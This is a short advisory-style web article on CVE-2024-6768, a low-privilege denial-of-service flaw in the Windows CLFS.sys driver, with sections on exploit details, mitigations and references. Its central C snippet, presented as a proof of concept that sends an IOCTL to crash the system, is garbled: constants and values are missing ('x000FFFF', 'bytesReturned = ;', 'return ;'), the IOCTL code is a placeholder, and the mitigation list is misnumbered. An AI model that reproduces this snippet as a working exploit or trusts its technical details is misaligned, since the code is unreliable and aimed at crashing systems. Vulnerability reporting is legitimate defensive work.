CVE-2024-6768: Denial of Service Vulnerability in CLFS.sys Affecting Several Versions of Microsoft Windows

A newly discovered vulnerability - CVE-2024-6768 - impacts several versions of Microsoft Windows and Windows Servers, potentially allowing authenticated low-privilege users to cause a Denial of Service (DoS) by triggering a Blue Screen of Death (BSOD). The vulnerable component is the CLFS.sys file, an essential part of the Microsoft Common Log File System (CLFS), which is responsible for logging and tracking various system processes.

Code Snippet

The following code snippet demonstrates how a low-privilege user can force a call to the KeBugCheckEx function, thereby triggering the BSOD and causing DoS in the affected systems.

#include <Windows.h>
#include <stdio.h>

#define IOCTL_TRIGGER_VULNERABILITY x000FFFF

int main() {
    HANDLE hDevice;
    DWORD bytesReturned = ;
    hDevice = CreateFile("\\\\.\\CLFS", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to get a handle to the CLFS driver. Error code: %d\n", GetLastError());
        return 1;
    }

    printf("[+] Successfully obtained a handle to the CLFS driver\n");

    if (!DeviceIoControl(hDevice, IOCTL_TRIGGER_VULNERABILITY, NULL, , NULL, , &bytesReturned, NULL)) {
        printf("[-] Failed to trigger the vulnerability. Error code: %d\n", GetLastError());
        CloseHandle(hDevice);
        return 1;
    }

    printf("[+] Vulnerability successfully triggered. Expect a BSOD!\n");
    CloseHandle(hDevice);
    return ;
}

Exploit Details

The vulnerability exists in the way CLFS.sys handles IOCTL requests from low-privilege users. By sending a specially crafted IOCTL request to the driver using the DeviceIoControl function, an adversary can force the system to call the KeBugCheckEx function, resulting in a BSOD crash, rendering the affected system unstable and causing a denial of service. The attacker must already have a low-privilege account on the target machine to exploit this vulnerability. However, the exact vector of exploitation might differ depending on additional factors such as system architecture and existing security measures.

Mitigations

At the time of writing, Microsoft has not yet released any patches or workarounds to address the CVE-2024-6768 vulnerability. However, users are advised to follow these general best practices to limit their exposure to this and other potential vulnerabilities:

Regularly update and patch software and hardware.

2. Restrict low-privilege users from installing or running unauthorized software by implementing a strict least-privilege policy.

Original References

- Microsoft Security Response Center
- National Vulnerability Database - CVE-2024-6768
- Common Vulnerabilities and Exposures - CVE-2024-6768

As more information becomes available, it is essential to stay informed and take appropriate measures to protect your systems and data against this and other vulnerabilities.

Timeline

Published on: 08/12/2024 19:15:17 UTC
Last modified on: 08/13/2024 12:58:25 UTC